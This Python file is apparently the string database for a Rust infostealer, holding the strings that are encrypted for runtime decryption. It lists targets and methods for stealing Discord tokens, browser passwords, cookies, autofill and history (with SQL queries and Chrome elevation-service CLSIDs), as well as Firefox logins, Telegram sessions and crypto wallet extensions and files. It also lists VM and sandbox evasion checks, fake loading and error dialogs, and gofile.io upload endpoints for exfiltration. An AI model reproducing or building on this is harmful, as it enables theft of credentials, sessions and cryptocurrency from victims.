# Database of all strings that need runtime decryption.
# Each entry: (function_name, plaintext_string)
# Function names are used by Rust source code as s_<name>().

STRINGS = [
    # === main.rs ===
    ("loading_title", "Loading..."),
    ("loading_text", "Please wait while the application is loading..."),
    ("api_url", "https://discord.com/api/v9/users/@me"),
    ("auth_header", "Authorization"),
    ("username_field", "username"),
    ("id_field", "id"),
    ("public_flags", "public_flags"),
    ("mfa_enabled", "mfa_enabled"),
    ("appdata", "APPDATA"),
    ("discord", "Discord"),
    ("discord_l", "discord"),
    ("discord_ptb", "DiscordPTB"),
    ("discord_ptb_l", "discordptb"),
    ("discord_canary", "DiscordCanary"),
    ("discord_canary_l", "discordcanary"),
    ("local_state", "Local State"),
    ("os_crypt", "os_crypt"),
    ("encrypted_key", "encrypted_key"),
    ("dpapi_prefix", "DPAPI"),
    ("leveldb", "Local Storage/leveldb"),
    ("token_marker", "dQw4w9WgXcQ:"),

    # === sandbox.rs ===
    ("error_title", "Error"),
    ("error_text", "An error occurred while initializing the application. Please restart the program."),
    ("localappdata", "LOCALAPPDATA"),
    ("sandbox_discord", "Discord"),
    ("sandbox_discord_ptb", "DiscordPTB"),
    ("sandbox_discord_canary", "DiscordCanary"),
    ("programs_discord", "Programs/Discord"),
    ("pf_discord", r"C:\Program Files\Discord"),
    ("pf86_discord", r"C:\Program Files (x86)\Discord"),

    # === zipp.rs ===
    ("passwords_txt", "passwords.txt"),
    ("cookies_txt", "cookies.txt"),
    ("autofill_txt", "autofill.txt"),
    ("history_txt", "history.txt"),
    ("discord_accounts_txt", "discord/accounts.txt"),

    # === nts.rs ===
    ("cookie_header", "# Netscape HTTP Cookie File\n# https://curl.se/docs/http-cookies.html\n# This file was generated automatically.\n"),

    # === ci.rs - Legacy cleanup ===
    ("chrome_recovery_result_json", "chrome_recovery_result.json"),
    ("cr_headless_profile", "cr_headless_profile"),

    # === chr.rs - Browser names ===
    ("browser_chrome", "Chrome"),
    ("browser_chrome_beta", "Chrome Beta"),
    ("browser_chrome_dev", "Chrome Dev"),
    ("browser_chrome_canary", "Chrome Canary"),
    ("browser_chrome_sxs", "Chrome SxS"),
    ("browser_chromium", "Chromium"),
    ("browser_edge", "Edge"),
    ("browser_edge_beta", "Edge Beta"),
    ("browser_edge_dev", "Edge Dev"),
    ("browser_brave", "Brave"),
    ("browser_brave_beta", "Brave Beta"),
    ("browser_brave_nightly", "Brave Nightly"),
    ("browser_opera", "Opera"),
    ("browser_opera_gx_name", "OperaGX"),
    ("browser_opera_neon", "Opera Neon"),
    ("browser_vivaldi", "Vivaldi"),
    ("browser_yandex", "Yandex"),
    ("browser_coccoc_name", "CocCoc"),
    ("browser_cent_name", "CentBrowser"),
    ("browser_360chrome_name", "360Chrome"),
    ("browser_epic_name", "Epic Privacy Browser"),
    ("browser_uran_name", "Uran"),
    ("browser_7star_name", "7Star"),
    ("browser_torch_name", "Torch"),
    ("browser_kometa_name", "Kometa"),
    ("browser_orbitum_name", "Orbitum"),
    ("browser_amigo_name", "Amigo"),
    ("browser_sputnik_name", "Sputnik"),
    ("browser_slimjet_name", "Slimjet"),
    ("browser_iridium_name", "Iridium"),
    ("browser_thorium_name", "Thorium"),

    # === chr.rs - Company/folder names ===
    ("browser_google", "Google"),
    ("browser_microsoft", "Microsoft"),
    ("browser_bravesoftware", "BraveSoftware"),
    ("browser_brave_browser", "Brave-Browser"),
    ("browser_brave_beta_dir", "Brave-Browser-Beta"),
    ("browser_brave_nightly_dir", "Brave-Browser-Nightly"),
    ("browser_opera_software", "Opera Software"),
    ("browser_opera_stable", "Opera Stable"),
    ("browser_opera_gx", "Opera GX Stable"),
    ("browser_opera_neon_dir", "Opera Neon"),
    ("browser_vivaldi_dir", "Vivaldi"),
    ("browser_yandex_co", "Yandex"),
    ("browser_yandex_browser", "YandexBrowser"),
    ("browser_coccoc", "CocCoc"),
    ("browser_coccoc_browser", "Browser"),
    ("browser_cent", "CentBrowser"),
    ("browser_360chrome", "360Chrome"),
    ("browser_epic", "Epic Privacy Browser"),
    ("browser_uran", "uCozMedia"),
    ("browser_uran_dir", "Uran"),
    ("browser_7star", "7Star"),
    ("browser_torch", "Torch"),
    ("browser_kometa", "Kometa"),
    ("browser_orbitum", "Orbitum"),
    ("browser_amigo", "Amigo"),
    ("browser_sputnik", "Sputnik"),
    ("browser_slimjet", "Slimjet"),
    ("browser_iridium", "Iridium"),
    ("browser_thorium", "Thorium"),
    ("browser_arc_company", "The Browser Company"),
    ("browser_arc_name", "Arc"),

    # === chr.rs - DB queries and paths ===
    ("user_data_path", "User Data"),
    ("dir_network", "Network"),
    ("file_cookies_db", "Cookies"),
    ("file_preferences", "Preferences"),
    ("login_data", "Login Data"),
    ("web_data", "Web Data"),
    ("history_db", "History"),
    ("db_wal", "-wal"),
    ("db_shm", "-shm"),
    ("db_journal", "-journal"),
    ("profile_info_cache", "/profile/info_cache"),
    ("app_bound_encrypted_key", "app_bound_encrypted_key"),
    ("query_logins", "SELECT origin_url, username_value, password_value FROM logins"),
    ("query_cookies", "SELECT host_key, name, encrypted_value, value, path, expires_utc, is_secure, is_httponly FROM cookies"),
    ("query_autofill", "SELECT name, value, count FROM autofill"),
    ("query_history", "SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC"),

    # === gck.rs - Browser names ===
    ("gck_firefox", "Firefox"),
    ("gck_firefox_esr", "Firefox ESR"),
    ("gck_firefox_dev", "Firefox Developer Edition"),
    ("gck_waterfox", "Waterfox"),
    ("gck_waterfox_g5", "Waterfox G5"),
    ("gck_librewolf", "LibreWolf"),
    ("gck_palemoon", "Pale Moon"),
    ("gck_basilisk", "Basilisk"),
    ("gck_seamonkey", "SeaMonkey"),
    ("gck_floorp", "Floorp"),
    ("gck_thunderbird", "Thunderbird"),
    ("gck_tor", "Tor Browser"),
    ("gck_kmeleon", "K-Meleon"),
    ("gck_icedragon", "IceDragon"),
    ("gck_cyberfox", "Cyberfox"),

    # === gck.rs - Companies/folders ===
    ("gck_mozilla", "Mozilla"),
    ("gck_profiles", "Profiles"),
    ("gck_moonchild", "Moonchild Productions"),
    ("gck_comodo", "Comodo"),
    ("gck_eightpecx", "8pecxstudios"),
    ("gck_mozilla_firefox_dir", "Mozilla Firefox"),
    ("gck_mozilla_firefox_esr_dir", "Mozilla Firefox ESR"),
    ("gck_firefox_dev_dir", "Firefox Developer Edition"),
    ("gck_waterfox_dir", "Waterfox"),
    ("gck_librewolf_dir", "LibreWolf"),
    ("gck_palemoon_dir", "Pale Moon"),
    ("gck_basilisk_dir", "Basilisk"),
    ("gck_seamonkey_dir", "SeaMonkey"),
    ("gck_floorp_dir", "Floorp"),
    ("gck_thunderbird_dir", "Mozilla Thunderbird"),
    ("gck_kmeleon_dir", "K-Meleon"),
    ("gck_icedragon_dir", "IceDragon"),
    ("gck_cyberfox_dir", "Cyberfox"),

    # === gck.rs - Tor paths ===
    ("gck_tor_browser", "Browser"),
    ("gck_torbrowser", "TorBrowser"),
    ("gck_tor_data", "Data"),

    # === gck.rs - NSS ===
    ("gck_nss3_dll", "nss3.dll"),
    ("gck_pk11sdr_decrypt", "PK11SDR_Decrypt"),
    ("gck_secitem_zfree", "SECITEM_ZfreeItem"),
    ("gck_nss_init", "NSS_Init"),
    ("gck_nss_init_readonly", "NSS_InitReadOnly"),
    ("gck_nss_shutdown", "NSS_Shutdown"),

    # === gck.rs - Logins ===
    ("gck_logins_json", "logins.json"),
    ("gck_logins_array", "logins"),
    ("gck_hostname_field", "hostname"),
    ("gck_enc_username", "encryptedUsername"),
    ("gck_enc_password", "encryptedPassword"),
    ("gck_key4_db", "key4.db"),
    ("gck_key3_db", "key3.db"),

    # === gck.rs - DB queries ===
    ("gck_cookies_sqlite", "cookies.sqlite"),
    ("gck_places_sqlite", "places.sqlite"),
    ("gck_formhistory_sqlite", "formhistory.sqlite"),
    ("gck_profiles_ini", "profiles.ini"),
    ("gck_query_moz_cookies", "SELECT host, name, value, path, expiry, isSecure, isHttpOnly FROM moz_cookies"),
    ("gck_query_places", "SELECT url, title, visit_count, last_visit_date FROM moz_places WHERE visit_count > 0 ORDER BY last_visit_date DESC"),
    ("gck_query_formhistory", "SELECT fieldname, value, timesUsed FROM moz_formhistory"),

    # === gofile.io ===
    ("gofile_upload_url", "https://upload.gofile.io/uploadfile"),
    ("gofile_domain", "https://gofile.io"),
    ("gofile_referer", "https://gofile.io/"),
    ("gofile_download_path", "https://gofile.io/d/"),

    # === detection.rs - VM/sandbox names ===
    ("det_sandbox", "sandbox"),
    ("det_cuckoo", "cuckoo"),
    ("det_vbox", "vbox"),
    ("det_vmware", "vmware"),
    ("det_xen", "xen"),
    ("det_qemu", "qemu"),
    ("det_virus", "virus"),
    ("det_malware", "malware"),
    ("det_currentuser", "currentuser"),

    # === detection.rs - VM driver files ===
    ("det_vboxguest_sys", "vboxguest.sys"),
    ("det_vmhgfs_sys", "vmhgfs.sys"),
    ("det_vboxsf_sys", "vboxsf.sys"),
    ("det_vboxvideo_sys", "vboxvideo.sys"),
    ("det_vboxmouse_sys", "VBoxMouse.sys"),
    ("det_vboxguest_sys2", "VBoxGuest.sys"),
    ("det_vmci_sys", "vmci.sys"),
    ("det_vm3dmp_sys", "vm3dmp.sys"),

    # === detection.rs - env vars ===
    ("det_computername", "COMPUTERNAME"),
    ("det_username", "USERNAME"),
    ("det_windir", "WINDIR"),
    ("det_system32_drivers", "System32\\drivers"),
    ("det_temp_sandbox", "\\sandbox"),
    ("det_temp_virus", "\\virus"),
    ("det_temp_sample", "\\sample"),

    # === telegram/mod.rs ===
    ("telegram_desktop", "Telegram Desktop"),
    ("tdata", "tdata"),

    # === wallet/mod.rs ===
    ("wallet_dir", "wallets"),

    # === wallet/browser_extensions.rs - Extension names ===
    ("wext_metamask", "MetaMask"),
    ("wext_metamask_id", "nkbihfbeogaeaoehlefnkodbefgpgknn"),
    ("wext_phantom", "Phantom"),
    ("wext_phantom_id", "bfnaelmomeimhlpmgjnjophhpkkoljpa"),
    ("wext_coinbase", "Coinbase"),
    ("wext_coinbase_id", "hnfanknocfeofbddgcijnmhnfnkdnaad"),
    ("wext_tronlink", "TronLink"),
    ("wext_tronlink_id", "ibnejdfjmmkpcnlpebklmnkoeoihofec"),
    ("wext_ronin", "Ronin"),
    ("wext_ronin_id", "fnjhmkhhmkbjkkabndcnnogagogbneec"),
    ("wext_binance_chain", "BinanceChain"),
    ("wext_binance_chain_id", "fhbohimaelbohpjbbldcngcnapndodjp"),
    ("wext_trust", "Trust"),
    ("wext_trust_id", "egjidjbpglichdcondbcbdnbeeppgdph"),
    ("wext_walletconnect", "WalletConnect"),
    ("wext_walletconnect_id", "amkmjjmmflddogmhpjloimipbofnfjih"),
    ("wext_math", "Math"),
    ("wext_math_id", "afbcbjpbpfadlkmhmclhkeeodmamcflc"),
    ("wext_nifty", "Nifty"),
    ("wext_nifty_id", "jbdaocneiiinmjbjlgalhcelgbejmnid"),
    ("wext_liquality", "Liquality"),
    ("wext_liquality_id", "kpfopkelmapcoipemfendmdcghnegimn"),
    ("wext_xdefi", "XDEFI"),
    ("wext_xdefi_id", "hmeobnfnfcmdkdcmlblgagmfpfboieaf"),
    ("wext_nami", "Nami"),
    ("wext_nami_id", "lpfcbjknijpeeillifnkikgncikgfhdo"),
    ("wext_eternl", "Eternl"),
    ("wext_eternl_id", "kmhcihpebfmpgmihbkipmjlmmioameka"),
    ("wext_yoroi", "Yoroi"),
    ("wext_yoroi_id", "ffnbelfdoeiohenkjibnmadjiehjhajb"),
    ("wext_solflare", "Solflare"),
    ("wext_solflare_id", "bhhhlbepdkbapadjdnnojkbgioiodbic"),
    ("wext_slope", "Slope"),
    ("wext_slope_id", "pocmplpaccanhmnllbbkpgfliimjljgo"),
    ("wext_keplr", "Keplr"),
    ("wext_keplr_id", "dmkamcknogkgcdfhhbddcghachkejeap"),
    ("wext_cosmostation", "Cosmostation"),
    ("wext_cosmostation_id", "fpkhgmpbidmiogeglndfbkegfdlnajnf"),
    ("wext_coin98", "Coin98"),
    ("wext_coin98_id", "aeachknmefphepccionboohckonoeemg"),
    ("wext_onekey", "OneKey"),
    ("wext_onekey_id", "jnmbobjmhlngoefaiojfljckilhhlhcj"),

    # === wallet/browser_extensions.rs - Browser names for wallet paths ===
    ("wext_chrome", "Chrome"),
    ("wext_brave", "Brave"),
    ("wext_edge", "Edge"),
    ("wext_opera", "Opera"),

    # === wallet/browser_extensions.rs - Path components ===
    ("wpath_google", "Google"),
    ("wpath_chrome_ud", "Chrome"),
    ("wpath_user_data", "User Data"),
    ("wpath_bravesoftware", "BraveSoftware"),
    ("wpath_brave_browser", "Brave-Browser"),
    ("wpath_microsoft", "Microsoft"),
    ("wpath_edge_ud", "Edge"),
    ("wpath_opera_software", "Opera Software"),
    ("wpath_opera_stable", "Opera Stable"),
    ("wpath_local_ext", "Local Extension Settings"),
    ("wpath_sync_ext", "Sync Extension Settings"),
    ("wpath_local_storage", "Local Storage"),
    ("wpath_indexeddb", "IndexedDB"),
    ("wpath_session_storage", "Session Storage"),
    ("wpath_local_state", "local state"),
    ("wpath_profile", "profile"),
    ("wpath_info_cache", "info_cache"),
    ("wpath_system_profile", "System Profile"),
    ("wpath_default", "Default"),
    ("wpath_profile_prefix", "Profile "),
    ("wpath_preferences", "Preferences"),
    ("wpath_sync", "Sync"),

    # === wallet/desktop_apps.rs - Wallet names ===
    ("dapp_exodus", "Exodus"),
    ("dapp_electrum", "Electrum"),
    ("dapp_atomic", "Atomic"),
    ("dapp_jaxx", "Jaxx"),
    ("dapp_zcash", "Zcash"),
    ("dapp_guarda", "Guarda"),
    ("dapp_coinomi", "Coinomi"),
    ("dapp_binance", "Binance"),
    ("dapp_tokenpocket", "TokenPocket"),
    ("dapp_bitcoin", "Bitcoin"),
    ("dapp_litecoin", "Litecoin"),
    ("dapp_dogecoin", "Dogecoin"),
    ("dapp_dash", "Dash"),
    ("dapp_ethereum", "Ethereum"),
    ("dapp_monero", "Monero"),

    # === wallet/desktop_apps.rs - App paths ===
    ("dapp_exodus_wallet", "exodus.wallet"),
    ("dapp_seed_seco", "seed.seco"),
    ("dapp_passphrase_json", "passphrase.json"),
    ("dapp_electrum_wallets", "wallets"),
    ("dapp_default_wallet", "default_wallet"),
    ("dapp_recent_servers", "recent_servers"),
    ("dapp_atomic_dir", "atomic"),
    ("dapp_databases", "databases"),
    ("dapp_jaxx_dir", "com.liberty.jaxx"),
    ("dapp_zcash_dir", "Zcash"),
    ("dapp_wallet_dat", "wallet.dat"),
    ("dapp_zcash_conf", "zcash.conf"),
    ("dapp_guarda_dir", "Guarda"),
    ("dapp_coinomi_dir", "Coinomi"),
    ("dapp_coinomi_wallets", "wallets"),
    ("dapp_coinomi_config", "coinomi.config"),
    ("dapp_binance_dir", "Binance"),
    ("dapp_tokenpocket_dir", "TokenPocket"),
    ("dapp_bitcoin_dir", "Bitcoin"),
    ("dapp_bitcoin_conf", "bitcoin.conf"),
    ("dapp_litecoin_dir", "Litecoin"),
    ("dapp_litecoin_conf", "litecoin.conf"),
    ("dapp_dogecoin_dir", "DogeCoin"),
    ("dapp_dogecoin_conf", "dogecoin.conf"),
    ("dapp_dash_dir", "DashCore"),
    ("dapp_dash_conf", "dash.conf"),
    ("dapp_ethereum_dir", "Ethereum"),
    ("dapp_keystore", "keystore"),
    ("dapp_monero_dir", "Monero"),
    ("dapp_monero_config", "monero_config"),
    ("dapp_appdata_roaming", "AppData"),
    ("dapp_roaming", "Roaming"),
    ("dapp_documents", "Documents"),
    ("dapp_userprofile", "USERPROFILE"),

    # === paths.rs - Browser exe names ===
    ("path_chrome_exe", "chrome.exe"),
    ("path_msedge_exe", "msedge.exe"),
    ("path_brave_exe", "brave.exe"),
    ("path_vivaldi_exe", "vivaldi.exe"),
    ("path_opera_exe", "opera.exe"),
    ("path_browser_exe", "browser.exe"),
    ("path_360chrome_exe", "360chrome.exe"),
    ("path_epic_exe", "epic.exe"),
    ("path_centbrowser_exe", "centbrowser.exe"),
    ("path_torch_exe", "torch.exe"),
    ("path_slimjet_exe", "slimjet.exe"),
    ("path_iridium_exe", "iridium.exe"),
    ("path_thorium_exe", "thorium.exe"),
    ("path_7star_exe", "7star.exe"),
    ("path_orbitum_exe", "orbitum.exe"),
    ("path_kometa_exe", "kometa.exe"),
    ("path_amigo_exe", "amigo.exe"),
    ("path_sputnik_exe", "sputnik.exe"),
    ("path_uran_exe", "uran.exe"),
    ("path_arc_exe", "Arc.exe"),

    # === paths.rs - User Data relative paths ===
    ("path_chrome_ud_rel", r"Google\Chrome\User Data"),
    ("path_chrome_beta_ud_rel", r"Google\Chrome Beta\User Data"),
    ("path_chrome_dev_ud_rel", r"Google\Chrome Dev\User Data"),
    ("path_chrome_sxs_ud_rel", r"Google\Chrome SxS\User Data"),
    ("path_chromium_ud_rel", r"Chromium\User Data"),
    ("path_edge_ud_rel", r"Microsoft\Edge\User Data"),
    ("path_edge_beta_ud_rel", r"Microsoft\Edge Beta\User Data"),
    ("path_edge_dev_ud_rel", r"Microsoft\Edge Dev\User Data"),
    ("path_brave_ud_rel", r"BraveSoftware\Brave-Browser\User Data"),
    ("path_brave_beta_ud_rel", r"BraveSoftware\Brave-Browser-Beta\User Data"),
    ("path_brave_nightly_ud_rel", r"BraveSoftware\Brave-Browser-Nightly\User Data"),
    ("path_opera_stable_ud_rel", r"Opera Software\Opera Stable"),
    ("path_opera_gx_ud_rel", r"Opera Software\Opera GX Stable"),
    ("path_opera_neon_ud_rel", r"Opera Software\Opera Neon\User Data"),
    ("path_vivaldi_ud_rel", r"Vivaldi\User Data"),
    ("path_yandex_ud_rel", r"Yandex\YandexBrowser\User Data"),
    ("path_coccoc_ud_rel", r"CocCoc\Browser\User Data"),
    ("path_cent_ud_rel", r"CentBrowser\User Data"),
    ("path_360_ud_rel", r"360Chrome\Chrome\User Data"),
    ("path_epic_ud_rel", r"Epic Privacy Browser\User Data"),
    ("path_uran_ud_rel", r"uCozMedia\Uran\User Data"),
    ("path_7star_ud_rel", r"7Star\7Star\User Data"),
    ("path_torch_ud_rel", r"Torch\User Data"),
    ("path_kometa_ud_rel", r"Kometa\User Data"),
    ("path_orbitum_ud_rel", r"Orbitum\User Data"),
    ("path_amigo_ud_rel", r"Amigo\User Data"),
    ("path_sputnik_ud_rel", r"Sputnik\Sputnik\User Data"),
    ("path_slimjet_ud_rel", r"Slimjet\User Data"),
    ("path_iridium_ud_rel", r"Iridium\User Data"),
    ("path_thorium_ud_rel", r"Thorium\User Data"),
    ("path_arc_ud_rel", r"The Browser Company\Arc\User Data"),

    # === paths.rs - Application paths for fallback ===
    ("path_pf", "ProgramFiles"),
    ("path_pf86", "ProgramFiles(x86)"),
    ("path_app_chrome", r"Google\Chrome\Application"),
    ("path_app_edge", r"Microsoft\Edge\Application"),
    ("path_app_brave", r"BraveSoftware\Brave-Browser\Application"),
    ("path_app_brave_beta", r"BraveSoftware\Brave-Browser-Beta\Application"),
    ("path_app_brave_nightly", r"BraveSoftware\Brave-Browser-Nightly\Application"),
    ("path_app_vivaldi", r"Vivaldi\Application"),
    ("path_app_opera", r"Programs\Opera"),
    ("path_app_opera_gx", r"Programs\Opera GX"),
    ("path_app_opera_roaming", r"Opera Software\Opera Stable"),
    ("path_app_yandex", r"Yandex\YandexBrowser\Application"),
    ("path_app_coccoc", r"CocCoc\Browser\Application"),
    ("path_app_360", r"360Chrome\Chrome\Application"),
    ("path_app_epic", r"Epic Privacy Browser\Application"),
    ("path_app_cent", r"CentBrowser\Application"),
    ("path_app_torch", r"Torch\Application"),
    ("path_app_slimjet", r"Slimjet\Application"),
    ("path_app_iridium", r"Iridium\Application"),
    ("path_app_thorium", r"Thorium\Application"),
    ("path_app_7star", r"7Star\7Star\Application"),
    ("path_app_orbitum", r"Orbitum\Application"),
    ("path_app_kometa", r"Kometa\Application"),
    ("path_app_amigo", r"Amigo\Application"),
    ("path_app_sputnik", r"Sputnik\Sputnik\Application"),
    ("path_app_uran", r"uCozMedia\Uran\Application"),
    ("path_app_arc", r"The Browser Company\Arc\Application"),

    # === discord/mod.rs - Badge emojis ===
    ("badge_staff", "<:Badge_Discord_Staff:1365704725646807060>"),
    ("badge_partner", "<:DiscordPartner:1365700977570742312>"),
    ("badge_hypesquad", "<:HypeSquadEvents:1365704359454834770>"),
    ("badge_bughunter1", "<:BugHunter1:1365701008184967278>"),
    ("badge_early", "<:86964earlysupporter:1345831325738995848>"),
    ("badge_nitro_classic", "<:NitroClassic:1365701254894419988>"),
    ("badge_nitro", "<:Nitro:1365701270424199680>"),
    ("badge_bughunter2", "<:BugHunter2:1365701027830960259>"),
    ("badge_developer", "<:developper:1365704272368500837>"),
    ("badge_dev", "<:dev:1365704127103107112>"),
    ("badge_moderator", "<:ModeratorProgramsAlumni:1365701046256533525>"),
    ("badge_active_dev", "<:ActiveDeveloper:1056677548395323432>"),

    # === discord/mod.rs - API ===
    ("discord_relationships", "relationships"),
    ("discord_ua", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"),

    # === elev.rs - Service names ===
    ("elev_chrome_svc", "GoogleChromeElevationService"),
    ("elev_edge_svc", "MicrosoftEdgeElevationService"),
    ("elev_brave_svc", "BraveElevationService"),

    # === elev.rs - CLSID hex ===
    ("elev_chrome_clsid", "708860E0-F641-4611-8895-7D867DD3675B"),
    ("elev_edge_clsid", "1FCBE96C-1697-43AF-9140-2897C7C69767"),
    ("elev_brave_clsid", "576B31AF-6369-4B6B-8560-E4B203A97A8B"),

    # === elev.rs - IID hex ===
    ("elev_chrome_iid1", "1BF5208B-295F-4992-B5F4-3A9BB6494838"),
    ("elev_chrome_iid2", "463ABECF-410D-407F-8AF5-0DF35A005CC8"),
    ("elev_edge_iid1", "8F7B6792-784D-4047-845D-1782EFBEF205"),
    ("elev_edge_iid2", "C9C2B807-7731-4F34-81B7-44FF7779522B"),
    ("elev_brave_iid1", "F396861E-0C8E-4C71-8256-2FAE6D759C9E"),

    # === sender/mod.rs ===
    ("sender_gofile_io", "gofile.io"),
    ("sender_download", "download"),
    ("sender_https", "https://"),
    ("sender_origin", "origin"),
    ("sender_referer", "referer"),
    ("sender_application_zip", "application/zip"),
    ("sender_file", "file"),
    ("sender_content", "content"),
    ("sender_embeds", "embeds"),

    # === wallet file patterns ===
    ("wpat_log", ".log"),
    ("wpat_ldb", ".ldb"),
    ("wpat_sst", ".sst"),
    ("wpat_current", "CURRENT"),
    ("wpat_lock", "LOCK"),
    ("wpat_dat", ".dat"),
    ("wpat_json", ".json"),
    ("wpat_db", ".db"),
    ("wpat_wallet", ".wallet"),
    ("wpat_aes", ".aes"),
    ("wpat_ipc", ".ipc"),
    ("wpat_keys", ".keys"),
    ("wpat_txt", ".txt"),
    ("wpat_conf", ".conf"),
    ("wpat_seco", ".seco"),
    ("wpat_leveldb", ".leveldb"),
    ("wpat_manifest", "MANIFEST-"),

    # === gecko extra ===
    ("gck_parent_lock", "parent.lock"),

    # === stealth/mod.rs - Chrome headless flags ===
    ("headless_flags", "--headless=new--disable-gpu--disable-logging--log-level=3--disable-background-networking--disable-sync--disable-default-apps--disable-extensions--disable-component-update--no-first-run--no-default-browser-check--noerrdialogs--disable-dev-tools--disable-features=Translate--disable-ipc-flooding-protection--disable-breakpad--metrics-recording-only--user-data-dir="),

    # === elev.rs - Additional CLSID/IID ===
    ("elev_chrome_clsidx", "704C2872-2049-435E-A469-0A534313C42B"),
    ("elev_edge_clsidx", "DD2646BA-3707-4BF8-B9A7-038691A68FC2"),

    # === api.rs - Windows API ===
    ("api_kernel32", "kernel32"),
    ("api_ntdll", "ntdll"),
    ("api_setenv", "SetEnvironmentVariableW"),
]


def get_all_strings() -> list:
    """Return all string definitions for encrypted.rs generation"""
    return STRINGS.copy()
